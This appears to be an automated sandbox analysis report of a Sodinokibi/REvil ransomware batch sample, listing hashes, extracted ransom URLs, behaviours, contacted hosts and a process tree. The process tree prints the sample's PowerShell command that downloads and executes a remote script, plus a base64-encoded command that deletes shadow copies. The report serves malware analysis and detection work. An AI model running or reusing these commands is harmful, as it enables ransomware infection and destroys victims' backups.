Analysis
-
max time kernel
139s -
max time network
158s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
01-05-2020 15:10
Static task
static1
Behavioral task
behavioral1
Sample
U00vnQbF.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
U00vnQbF.bat
Resource
win10v200430
General
-
Target
U00vnQbF.bat
-
Size
191B
-
MD5
2300705e455665cbeb1087bfc25c672c
-
SHA1
737493862ea5a0c4de10f4e2fda82000c45e8779
-
SHA256
adba07f4a5d9a769b00d436a0e7c89777664b8cc17bd2515e951572fff8a634f
-
SHA512
26864b6c938379a876018ffcb1c927ff9806cb5fdc93d2088cf59ef3b7487bf81952c9e843d9ae1b3f827f3ba43dc7acf4b2a974e9bbfc709d58215982399911
Malware Config
Extracted
http://185.103.242.78/pastes/U00vnQbF
Extracted
C:\28b86t67-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5C323C8674D79305
http://decryptor.cc/5C323C8674D79305
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Drops file in Program Files directory 18 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\AssertRemove.eps powershell.exe File opened for modification \??\c:\program files\InitializeReceive.css powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\28b86t67-readme.txt powershell.exe File created \??\c:\program files (x86)\28b86t67-readme.txt powershell.exe File opened for modification \??\c:\program files\LockSelect.ppsm powershell.exe File opened for modification \??\c:\program files\UseAssert.svgz powershell.exe File opened for modification \??\c:\program files\SuspendRestore.3gp powershell.exe File opened for modification \??\c:\program files\SwitchMount.pptm powershell.exe File created \??\c:\program files\28b86t67-readme.txt powershell.exe File opened for modification \??\c:\program files\ConnectSet.kix powershell.exe File opened for modification \??\c:\program files\InvokeSave.pub powershell.exe File created \??\c:\program files\microsoft sql server compact edition\28b86t67-readme.txt powershell.exe File opened for modification \??\c:\program files\StepConvert.mpeg powershell.exe File opened for modification \??\c:\program files\StepSave.dotm powershell.exe File opened for modification \??\c:\program files\TraceBackup.m1v powershell.exe File opened for modification \??\c:\program files\ConvertFromResize.dotx powershell.exe File opened for modification \??\c:\program files\RegisterDebug.php powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\28b86t67-readme.txt powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1428 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1428 powershell.exe 1428 powershell.exe 1428 powershell.exe 1076 powershell.exe 1076 powershell.exe -
Blacklisted process makes network request 150 IoCs
Processes:
powershell.exeflow pid process 1 1428 powershell.exe 3 1428 powershell.exe 5 1428 powershell.exe 6 1428 powershell.exe 8 1428 powershell.exe 10 1428 powershell.exe 12 1428 powershell.exe 14 1428 powershell.exe 15 1428 powershell.exe 19 1428 powershell.exe 20 1428 powershell.exe 22 1428 powershell.exe 24 1428 powershell.exe 29 1428 powershell.exe 31 1428 powershell.exe 33 1428 powershell.exe 34 1428 powershell.exe 36 1428 powershell.exe 38 1428 powershell.exe 39 1428 powershell.exe 41 1428 powershell.exe 42 1428 powershell.exe 44 1428 powershell.exe 45 1428 powershell.exe 47 1428 powershell.exe 49 1428 powershell.exe 50 1428 powershell.exe 52 1428 powershell.exe 54 1428 powershell.exe 55 1428 powershell.exe 57 1428 powershell.exe 59 1428 powershell.exe 60 1428 powershell.exe 63 1428 powershell.exe 65 1428 powershell.exe 67 1428 powershell.exe 69 1428 powershell.exe 71 1428 powershell.exe 73 1428 powershell.exe 75 1428 powershell.exe 78 1428 powershell.exe 79 1428 powershell.exe 81 1428 powershell.exe 83 1428 powershell.exe 85 1428 powershell.exe 87 1428 powershell.exe 89 1428 powershell.exe 90 1428 powershell.exe 92 1428 powershell.exe 94 1428 powershell.exe 95 1428 powershell.exe 97 1428 powershell.exe 98 1428 powershell.exe 100 1428 powershell.exe 101 1428 powershell.exe 103 1428 powershell.exe 104 1428 powershell.exe 106 1428 powershell.exe 108 1428 powershell.exe 110 1428 powershell.exe 111 1428 powershell.exe 113 1428 powershell.exe 115 1428 powershell.exe 117 1428 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\rs9bc9.bmp" powershell.exe -
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\36B12B49F9819ED74C9EBC380FC6568F5DACB2F7 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\36B12B49F9819ED74C9EBC380FC6568F5DACB2F7\Blob = 040000000100000010000000f1bc636a54e0b527f5cde71ae34d6e4a0f00000001000000140000009a680178cfa26912ab0dfa84d27d892aa0235881190000000100000010000000a2049dcd69cd217792d9b30d5291298503000000010000001400000036b12b49f9819ed74c9ebc380fc6568f5dacb2f71d0000000100000010000000446b89a35bbf3713f943e2826b1847ee140000000100000014000000a073499968dc855b65e39b282f579fbd33bc074853000000010000002400000030223020060a2a83088c9b1b6485510130123010060a2b0601040182373c0101030200c00b00000001000000360000005300450043004f004d002000540072007500730074002000530079007300740065006d007300200043004f0020004c0054004400000009000000010000003e000000303c06082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030806082b0601050507030920000000010000005e0300003082035a30820242a003020102020100300d06092a864886f70d01010505003050310b3009060355040613024a5031183016060355040a130f5345434f4d2054727573742e6e657431273025060355040b131e536563757269747920436f6d6d756e69636174696f6e20526f6f74434131301e170d3033303933303034323034395a170d3233303933303034323034395a3050310b3009060355040613024a5031183016060355040a130f5345434f4d2054727573742e6e657431273025060355040b131e536563757269747920436f6d6d756e69636174696f6e20526f6f7443413130820122300d06092a864886f70d01010105000382010f003082010a0282010100b3b3fe7fd36db1ef167c57a50c6d768a2f4bbf64fb4cee8af0f3297cf5ffee2ae0e9e9ba5b64229a9a6f2c3a266951059926dcd51c6a71c69a7d1e9ddd7c6cc68c67674a3ef871b01927a9090ca695bf4b8c0cfa55983bd8e822a14b713879ac979269b3897eea21680698149687d26136bc6d27569e57eec0c056fd32cfa4d98ec223d78da8f3d825ac97e47038f4b63ab49d3b972643a3a1bc4959724c2330870158f64ebe1c685666afcd415dc8b34d2a5546ab1fda1ee2403ddbcd7db992809c37dd0c96649ddc22f7648bdf61de15945215a07d52c94ba821c9c6b1edcbc39560d10ff0ab70f8dfcb4d7eecd6faabd9bd7f54f2a5e979fad9d6762428730203010001a33f303d301d0603551d0e04160414a073499968dc855b65e39b282f579fbd33bc0748300b0603551d0f040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d010105050003820101006840a9a8bbe44f5d79b305b517b36013ebc6925de0d1d36afefbbe9b6dbfc7056d5920c41cf0b7da84580263fa4816ef4fa50bf74a98f23f9e1bad476b63ce0847eb523f789caf4daef8d54fcf9a982a10413952c4ddd99b0eef9301aeb22eca684224426cb0b33a3ecde9da48c415cbe9f9070f9250498add31975fc9e937aa3b5965979432c9b39f3e3a6258c549ad620e71a532aa2fc6897643401313673da2542510cbf13af2d9fadb4956bba6fea74135c3e08861c988c7df3610229859eab04afb5616736eac4df722a14fad1d7a2d4527e530c15ef2da13cb2542519547038c6c21cc7442ed53ff338b8f0f5701162fcfa6eec9702214bdfdbe6c0b03 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b06010505080202200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Makes http(s) request 44 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 122 https://mapawood.com/content/pictures/uo.png HTTP URL 218 https://ctrler.cn/uploads/game/yspx.gif HTTP URL 249 https://sportiomsportfondsen.nl/news/game/yeucpsbgnzfurp.png HTTP URL 155 http://secure.globalsign.com/cacert/gsrsadvsslca2018.crt HTTP URL 83 https://bigasgrup.com/uploads/assets/squi.jpg HTTP URL 113 https://drfoyle.com/static/temp/xatgrztowu.png HTTP URL 81 https://xltyu.com/news/pics/qdutzixqly.png HTTP URL 124 https://smale-opticiens.nl/content/pics/sn.jpg HTTP URL 130 https://dnepr-beskid.com.ua/news/pictures/sjqrytxe.jpg HTTP URL 193 https://intecwi.com/content/pics/pzsamfckjx.jpg HTTP URL 264 https://bimnapratica.com/ HTTP URL 159 https://loprus.pl/static/image/snyp.jpg HTTP URL 22 https://charlottepoudroux-photographie.fr/data/pictures/ztamotmszzcm.png HTTP URL 31 https://www.raschlosser.de/uploads/images/rcoeun.png HTTP URL 71 https://pocket-opera.de/data/game/bbekkangsh.png HTTP URL 146 https://homng.net/uploads/pictures/qtddtssm.jpg HTTP URL 1 http://185.103.242.78/pastes/U00vnQbF HTTP URL 20 https://jobcenterkenya.com/ HTTP URL 36 https://hrabritelefon.hr/content/pictures/zukphabo.png HTTP URL 65 https://danubecloud.com/admin/pictures/rwie.png HTTP URL 10 http://apps.identrust.com/roots/dstrootcax3.p7c HTTP URL 8 https://deschl.net/static/pics/icxmsk.gif HTTP URL 57 https://onlybacklink.com/static/pics/xycquwdvpx.png HTTP URL 85 https://www.bigasgrup.com/uploads/assets/squi.jpg HTTP URL 115 https://www.drfoyle.com/static/temp/xatgrztowu.png HTTP URL 120 https://1team.es/static/temp/wx.png HTTP URL 208 https://schraven.de/include/pics/yyiv.gif HTTP URL 237 https://mercantedifiori.com/content/pictures/cnzl.gif HTTP URL 254 https://slupetzky.at/include/temp/knzejcbr.jpg HTTP URL 19 https://jobcenterkenya.com/include/image/oqfzcq.png HTTP URL 69 https://corona-handles.com/content/tmp/jbzgdhifsvtt.gif HTTP URL 263 https://bimnapratica.com/static/game/xubbosth.gif HTTP URL 73 https://www.pocket-opera.de/data/game/bbekkangsh.png HTTP URL 106 https://architecturalfiberglass.org/admin/pictures/bfifczjxwx.jpg HTTP URL 24 https://sairaku.net/static/temp/bftwhwsp.gif HTTP URL 29 https://raschlosser.de/uploads/images/rcoeun.png HTTP URL 242 https://fransespiegels.nl/static/tmp/lboeff.gif HTTP URL 67 https://imadarchid.com/data/temp/xdtotaqj.png HTTP URL 12 http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP URL 108 https://www.architecturalfiberglass.org/admin/pictures/bfifczjxwx.jpg HTTP URL 244 https://igfap.com/uploads/assets/rrcqoyewhd.jpg HTTP URL 256 https://trystana.com/content/graphic/uhva.jpg HTTP URL 75 https://autodujos.lt/news/pics/zbvg.png HTTP URL 233 https://mir-na-iznanku.com/wp-content/temp/krwvve.gif -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1288 wrote to memory of 1428 1288 cmd.exe powershell.exe PID 1428 wrote to memory of 1076 1428 powershell.exe powershell.exe PID 1428 wrote to memory of 1076 1428 powershell.exe powershell.exe PID 1428 wrote to memory of 1076 1428 powershell.exe powershell.exe PID 1428 wrote to memory of 1076 1428 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1428 powershell.exe Token: SeDebugPrivilege 1428 powershell.exe Token: SeDebugPrivilege 1076 powershell.exe Token: SeBackupPrivilege 1736 vssvc.exe Token: SeRestorePrivilege 1736 vssvc.exe Token: SeAuditPrivilege 1736 vssvc.exe Token: SeTakeOwnershipPrivilege 1428 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\U00vnQbF.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/U00vnQbF');Invoke-HDBVPMGW;Start-Sleep -s 10000"2⤵
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Sets desktop wallpaper using registry
- Modifies system certificate store
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:1428 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1076
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1736